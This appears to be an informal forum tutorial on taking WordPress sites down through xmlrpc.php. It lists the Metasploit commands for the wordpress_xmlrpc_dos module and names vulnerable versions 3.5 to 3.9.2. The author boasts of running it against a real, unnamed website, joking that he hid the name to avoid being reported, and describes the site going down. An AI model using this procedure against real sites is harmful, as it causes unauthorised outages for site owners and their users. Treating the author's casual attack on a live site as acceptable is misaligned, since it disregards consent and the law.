DoS in WordPress with xmlrpc.php
What's up, guys, I bring you this small
What is xmlrpc.php for?
xmlrpc.php lets us post remotely from Microsoft Word, TextMate, Thunderbird, smartphones and other clients, all through the XML-RPC protocol.
It is also responsible for receiving pingbacks (links from other blogs to one of our articles) and sending trackbacks (links from our blog to articles on another blog).
Well, the xmlrpc vulnerability is from long ago:
this file is used to carry out a powerful DoS attack, for which our friend Metasploit has already done the work :D
Code:
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos
msf auxiliary(wordpress_xmlrpc_dos) > show actions
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION
msf auxiliary(wordpress_xmlrpc_dos) > show options
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run
I look for a website running a vulnerable WP version: 3.5 - 3.9.2
I am not showing the website, to demonstrate something ethical (no lie, so as not to get reported, hahaha)
After filling in rhost and targeturi, we run it
and with this we start the DoS; the website goes down at times, but let us look at a
load speed test before and after:
Before:
With the DoS active:
Regards!